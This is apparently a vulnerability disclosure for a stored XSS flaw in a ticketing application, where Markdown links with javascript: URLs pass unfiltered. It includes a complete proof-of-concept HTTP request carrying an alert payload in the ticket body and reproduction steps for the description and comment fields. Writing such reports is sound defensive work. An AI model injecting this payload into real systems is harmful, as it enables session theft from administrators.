Stored XSS via Markdown at Description or Comment of Ticket
When rendering to Markdown, the application does not filter and check the properties are valid, so when the user enters [XSS](javascript:alert(`document.domain`))
it will render as <a href>XSS</a>
.
// PoC.req
POST /tickets/submit/ HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/tickets/submit/
Content-Type: multipart/form-data; boundary=---------------------------69350364819088505273728279714
Content-Length: 1161
Origin: http://127.0.0.1:8080
DNT: 1
Connection: close
Cookie: csrftoken=UQd46tUHKV3P08qcvIBTOBWDzS9nDZT8TDeCT6W8ThDUPLdWgKmlxwF3bBEGThC0
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="csrfmiddlewaretoken"
o6SgjwQ9VozjIi2mYHAi5ImkD7UbKviMnTTO69SA4K9oxVP6JJlKOD5KfQpu0N1E
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="queue"
1
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="title"
XSS Markdown
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="body"
[XSS](javascript:alert(`document.domain`))
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="priority"
3
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="due_date"
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="attachment"; filename=""
Content-Type: application/octet-stream
-----------------------------69350364819088505273728279714
Content-Disposition: form-data; name="submitter_email"
[email protected]
-----------------------------69350364819088505273728279714--
Goto URL without login to create a new ticket: https://[DOMAIN]/tickets/submit/
At field [Description of your issue input with payload: [XSS](javascript:alert(`document.domain`))
At field [Comment / Resolution] input with payload: [XSS](javascript:alert(`document.domain`))
The XSS will trigger when the admin click on the content of the description or the comment
This vulnerability has the potential to steal a user’s cookie and gain unauthorized access to that user’s account through the stolen cookie.